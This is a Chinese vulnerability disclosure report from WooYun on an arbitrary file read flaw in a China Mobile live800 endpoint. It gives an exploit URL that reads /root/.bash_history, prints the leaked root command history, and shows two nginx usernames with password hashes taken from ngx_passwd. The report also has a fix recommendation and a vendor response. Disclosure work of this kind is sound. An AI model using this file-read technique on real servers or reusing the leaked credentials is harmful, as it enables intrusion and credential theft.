
漏洞概要

缺陷编号:wooyun-2016-0198788

漏洞标题:中国移动某站任意文件读取

相关厂商:中国移动

漏洞作者: 小川

提交时间:2016-04-21 13:30

修复时间:2016-06-09 16:20

公开时间:2016-06-09 16:20

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]



漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

中国移动某站任意文件读取

详细说明:

服务以 root 权限运行,因此可以通过该接口读取 root 用户的历史命令(/root/.bash_history):
http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history
cd
cd
ls
cd /
find ./ -name 'nginx*'
cd ./usr/local/nginx
ls
cd sbin
ls
./nginx -v
ps -ef|grep nginx
cd ..
ls
cd conf
ls
cat nginx.conf
vi nginx.conf
ls
cd ..
ls
cd sbin
ls
./nginx
ifconfig -a
ls
cd ..
ls
cd conf
ls
vi nginx.conf
ls
ps -ef|grep nginx
cd ..
ls
cd bin
cd sbin
ls
./nginx -s reload
ps -ef|grep nginx
ps -ef|grep nginx
./nginx -s stop
ps -ef|grep nginx
./nginx
ps -ef|grep nginx
ifconfig -a
ls
export TMOUT=0
ls
cd /
find ./ -name 'nginx'
cd usr
cd local
cd nginx
ls
cd conf
ls -ltr |wc -l
ls
ls -ltr
cat nginx.conf.default
ls
pwd
ifconfig -a
cd ..
ls
cd html
ls
cd ..
ls
pwd
cd html
ls
cd ..
ls
find ./ -name 'emapdomains*'
cd client_body_temp
ls
cd ..
ls
cd fastcgi_temp
ls
cd ..
ls
cd proxy_temp
ls
cat 1
cd 1
ls
file 00
cd 00
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd scgi_temp
ls
cd ..
ls
cd uwsgi_temp
ls
cd ..
ls
cd on
ls
cd conf
ls
ls -ltr
cat mime.types
ls -ltr|wc -l
ls -ltr
cd
cd etc
cd /etc
ls
cat hosts
cat resolv.conf
cd /usr/local
cd nginx
ls
cd conf
ls
cat nginx.conf
cat upstream.conf
cat nginx.conf
ls
more proxy.conf
ls -ltr
cat proxy.conf
ls -ltr
cat upstream.conf
cd
ls
cd /
find ./ -name '*emapdomains*'
ls
cd /usr/local
ls
cd nginx
ls
cd conf
ls
grep emapdomains *
ls
cd ..
ls
cd logs
ls
pwd
cd ..
ls
cd conf
ls
ls
pwd
ifconfig -a
ls
cd ..
ls
tar cvf ../nginx_conf_byld_20160113.tar conf
ls
cd ..
ls
ls
export TMOUT=0
ls
ps -ef|grep nginx
cd /
find ./ -name
find ./ -name 'nginx*'
pwd
find ./ -name '**.**.**.**'
cd /usr/local
cd nginx
ls
cd conf
ls
cat nginx-conf
ifconfig -a
ls -ltr
cd key
ls
cd ..
ls
cat ngx_passwd
pwd
cd /usr
ls
cd local
ls
cd bushu
cd nginx
ls
cd
cd /
ls
find ./ -name 'configure'
more ./home/Nginx/pcre-8.35/configure
!
ls
ls
ls
cd
ls
cd ..
ls
cd /usr
ls
cd local
ls
cd sbin
ls
cd ..
ls
cd nginx
ls
cd conf
ls
cd ..
ls
cd logs
ls
ls -ltr
cd data
ls
cat *
cd
ls
ls
cd /usr
cd local
ls
cd nginx
ls
cd conf
ls
cat upstaream.conf
more upstream.conf
ls
more nginx.conf
ls
more upstream.conf
cd ..
ls
cd sbin
ls
./nginx
ps -ef|grep nginx
export TMOUT=0
cd /usr/local/nginx
cd /etc/init.d
ls
cd ..
vi hosts
cd /usr/local/nginx
ls
cd conf/
ls
cat upstream.conf
cd /etc/init.x
cd /etc/init.d
vi nginx
ps -ef | grep ngixn
ps -ef | grep nginx
cd /usr/local
ls
cd nginx
ls
cd conf
ls
ls -ltr
more nginx.conf

vi nginx.conf
ifconfig
exit
cd /usr/local
ls
cd nginx
ls
pwd
cd html
ls
ls -ltr
cd ../conf
ls
vi nginx.conf
ifconfig
cd /usr/local
ls
cd nginx
ls
ls -ltr
cd conf
ls
vi nginx.conf
ls
cd /usr
cd local
ls
cd nginx
ls
ps -ef|grep nginx
cd logs
ls -ltr
tail -f access-bassapp.log
ls -ltr
grep mbomc access-bassapp.log
grep mbomc access.log
cd ..
ls
cd conf
ls
vi nginx.conf
;s
ls
cd /usr
cd local
ls
cd nginx
ls
cd logs
ls -ltr
tail -f access.log
ls -ltr
tail -10000f access-mbomc.log
cd /usr
cd local
cd nginx
ls
cd sbin
ls
./nginx -s reload
ps -ef|grep nginx
cd /
find ./ -name 'Squid'
find ./ -name Squid
find ./ -name squid
ps -ef|grep squid
export TMOUT=0
ls
cd /usr
ls
cd local
ls
cd nginx
ls
cd conf
ls
vi nginx.conf
vi nginx.conf
ls
cd ..
ls
ls
export TMOUT=0
ls
cd conf
ls
ls -ltr
exit
ls
ls -ltr
ls
cd /usr
ls
cd local
ls
cd nginx
ls
cd conf
ls
vi nginx.conf
ls
cd ../sbin
ls
./nginx -s stop
vi /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx
exit
ls
export TMOUT=0
ls
cd /usr
ls
cd local
ls
cd nginx
cd conf
ls
vi upstream.conf
pwd
ifconfig -a
pwd
cd ../sbin
ls
./nginx -s stop
ps -ef|grep nginx
ls
cd ..
ls
cd conf
ls
vi upstream.conf
cd ../sbin
ls
./nginx -s stop
cd ../conf
ls
vi upstream.conf
cd ../sbin
ls
./nginx -s stop
ps -ef|grep nginx
pwd
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx
exit
ls
cd /usr/local
cd nginx
cd conf
vi nginx.conf
cd ../sbin
./nginx -s reload
ps -ef|grep nginx
cd /usr/local/nginx
cd conf/
vi nginx.conf
vi nginx.conf
cd ../sbin/
ls
./nginx -s reload
vi ../conf/nginx.conf
./nginx -s reload
cd ../conf/
ls
vi upstream.conf
vi ../conf/nginx.conf
cd ../sbin/
./nginx -s reload
exit
ipconfig -a
ipfongi
ipconfig
ifconfig
uname -a
top
ifconfig
ls
uname -a
ps
ssh root@**.**.**.**
ls -ltr
ls -ltr /usr/local/nginx/sbin/nginx*
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx.conf
ps -ef|grep nginx
cd
ls
cd ..
ls
cd /home
ls
cd live800
ls
cat startLive800Server.sh
./startLive800Server.sh
ps -ef|grep tomcat
ifconfig
ifconfig |more
netstat -rn
ping **.**.**.**
ssh **.**.**.**
who
ls
cd /
find ./ -name squid
cd ./etc/squid
ls
pwd
cd ./usr/sbin/
cd /
cd ./usr/sbin/
ls
./usr/sbin/squid -s
cd /
/usr/sbin/squid -s
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
exit
cd /
find ./ -name 'squid'
/usr/sbin/squid -s
ps -ef|grep squid
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
more nginx.conf
ls
more nginx.conf
exit
cd /usr/local/nginx
ls
cd conf/
vi nginx.conf
cd ../sbin
./nginx -s reload
cd ..logs
cd ../logs
ls
tail -f access.log
cd ..
cd conf/
ls
vi upstream.conf
cd ../sbin/
./nginx -s reload
exit
ls
ls
cd
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
more nginx.conf
ls
cd
ls
ls
ps -ef|grep nginx
/usr/local/nginx/sbin/nginx -s reload
ps -ef|grep nginx
exit
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
cd ..
ls
cd logs
ls
ls -ltr
tail -f access.log
ping **.**.**.**
tail -f access-mbomc.log
ping **.**.**.**
ping **.**.**.**
ls
export TMOUT=0
ls
cd
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
ls -ltr
cd ..
ls
cd logs
ls
ls -ltr
tail -1000f access-mbomc.log
LS
ls
ls -ltr
tail -f access-mbomc.log
ls
ls -ltr
tail -f access-mbomc.log
ls -ltr
ipconfig -a
ifconfig -a
ssh root@**.**.**.**
ssh root@**.**.**.**
cd
ls
cd /usr/local/nginx
ls
cd conf
ls
more nginx.conf
ls
ifconfig -a
uname -a
ls
pwd
cd /home
ls
cd live800
ls
cd working
ls
cd tomcat
ls
ls
cd /
find ./ -name 'live800'
cd ./home/live800
ls
cd ./home/live800/working/tomcat/live800
ls
cd working
ls
cd tomcat
ls
cd ..
ls
cd ..
ls
more startLive800Server.sh
cd ../tomcat/
ls
cd working
ls
cd tomcat
ls
ls -ltr
cd webapps
ls
cd live800
ls
pwd
cd /home/live800/working/tomcat/webapps/live800
cd live800
]
ifconfig -a
uname
cd /home
ls
cd /live800
cd live800
ls
startLive800Server.sh
sh startLive800Server.sh
ps -ef|grep live800
ps -ef|grep nginx
cd /usr/local
ls
ls
cd /usr/local
ls
cd gninx
cd nginx
ls
cd sbin
ls
pwd
export TMOUT=0
cd ..
ls
cd conf
ls
pwd
cd
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx
ls
cd /home
cd live800
ls
ls -ltr
cd working
ls
ftp **.**.**.**
cd /home
cd live800
ls
cd /work
cd /working
ls
cd working
ls
cd tomcat
ls
cd live800
ls
cd chatClient
ls
cd chinamobile
ls
cd scripts
ls -F
cd chatbox.js
ls
ls -F
ls -l
cd
ls
cd /home
ls
cd live800
ls
cd working
ls
cd tomcat
ls
cd tomcat
ls
cd ..
ls
cd tomcat
ls
cd webapps
ls
ls -ltr
cd live800
ls
ls -ltr zxkf_index.jsp
ls -ltr *index.jsp*
more index.jsp
more showAccount.jsp
more showAccount.jsp
ls -ltr chatbox.jsp
ls
cd chatClient
ls
more chatbox.htm
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
more nginx.conf
ls
ls -ltr
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
vi nginx.conf
cd ..
ls
cd sbin
ls
./nginx -s reload
ps -ef|grep nginx
exit
ps -ef | grep ngix
ps -ef | grep ng
ps -ef|grep nginx
cat /usr/local/nginx/conf/nginx.conf
env
ls
find . -name | grep 'index2'
find . -name *.* | grep 'index2'
find . -name 'index2'
find . -name 'index2'pwd
cd ..
ls
find . -name 'index2'
find . -name 'index2.jsp'
cat ./sys/devices/system/cpu/cpu15/cache/index2
cd ./sys/devices/system/cpu/cpu15/cache/index2
ls
cd ..
ls
cd
cd ..
ls
find . -name 'index2.jsp'
cd /home
cd /live800
ls
cd live800
ls
cd working
ls -l
cd tomcat
ls -l
cd webapps
ls
cd live800
ls -l
ls
ls
ls
cd /home
ls
cd live800
ls
cd working
ls
ps -ef|grep nginx
cd /usr/local/nginx/sbin/
./nginx -s reload
export TMOUT=0
./nginx -s reload
ls
cd ..
ls
cd conf
ls
vi nginx.conf
cd ..
ls
cd sbin
./nginx -s reload
cd ..
cd conf
ls
vi nginx.conf
ls
cd /dev
ls
cd shm
ls
cdls
cd
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
vi nginx.conf
vi proxy.conf
ls
cd cache
cd /cache
ls
cd proxy_temp_path
ls
ls -ltr
pwd
ls -ltr
rm *
ls
cd ..
ls
cd proxy_cache_path
ls
du -sm *
cd 0
ls
cd 00
ls
ifconfig
exit
ls
ls
ps -ef|grep nginx
cd /usr/local/nginx/sbin/
ls
./nginx -s reload
ls
ps -ef|grep nginx
pwd
cd ..
ls
cd client_body_temp
ls
cd ..
ls
cd fastcgi_temp
ls
cd ..
ls
cd html
ls
cd images
ls
cd ..
ls
cd ..
ls
cd on
cd proxy_temp
ls
file 1
cd 1
ls
file *
cd 00
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd scgi_temp
ls
cd ..
ls
cd uwsgi_temp
ls
cd
export TMOUT=0
ssh **.**.**.**
ls
ps -ef | grep nginx
cat /usr/local/nginx/conf/nginx.conf
ls
pwd
ls -A
cd /home
ls
cd /live800
find ./ 'live800'

e ff
ls
sd ..
cd ..
pwd
cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp
find ./'zxkf_index.jsp'
exit
ls
cd /home/live800/working/tomcat/webapps/live800
ls
cd /home/live800/working/tomcat/webapps/live800
ls
find .-name zxkf_index.jsp
cd ..
ls
cd ..
cd ..
ls
pwd
cd ..
cd ..
ls
pwd
cd .
ls
cd ..
find .-name zxkf_index.jsp
cd /home/live800/working/tomcat
ls
cd /restartTomcat.sh
exit
ls
pwd
/home/live800/working/
cd /home
ls
cd /live800
/home/live800/working/tomcat/webapps/live800
cd /home/live800/working/tomcat/webapps/live800
ps -ef|grep live800
ls
cd /home/live800
ls
cd /working
cd /home/live800/working/tomcat/webapps/live800
ps -ef|grep "live800"
ls
pwd
ps -ef|grep live800
ls
pwd
ls -f
find -name/ live800
find
ls
pwd
cd /home
ls
cd /weblogic
pwd
ps -ef| grep live800
ls -A
ls -a
ls
cd /home/live800/working/tomcat/restartTomcat.sh
cd /home/live800/working/tomcat/
ls
ls -a
pwd
find /-name live800
ls
cd /live800
find /-name "zxkf_index.jsp"
pwd
cd..
cd ..
cd
pwd
history 20
history 50
exit
ls
history 50
ls
pwd
ls -A
cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp
cd /SDSSO
ls
ls
ls -a
另外还看到 http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd
zhangyong:2RsUTTsvOmOdA
zengqh:DunTiVFkBxz7A
应该是 nginx 的登录密码(ngx_passwd 文件内容)

漏洞证明:

修复方案:

升级;同时建议对 downlog.jsp 的 path/fileName 参数做限制,只允许读取指定目录下的文件,并避免以 root 权限运行该服务。

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-04-25 16:18

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-21 14:20 | Dotaer ( 路人 | Rank:24 漏洞数:8 | 多学习,多挖洞!)

    前排求关注!

  2. 2016-04-21 15:47 | 变色龙 ( 路人 | Rank:2 漏洞数:2 | 好好学习,天天向上。)

    泄露啥重要资料?

  3. 2016-05-22 09:35 | sutdy ( 普通白帽子 | Rank:113 漏洞数:37 | 0.0)

    提醒:级别足够但是无法查看 Rank 高于自己的白帽子漏洞 ( 可以等待进一步公开或者支付 4 个乌云币提前查看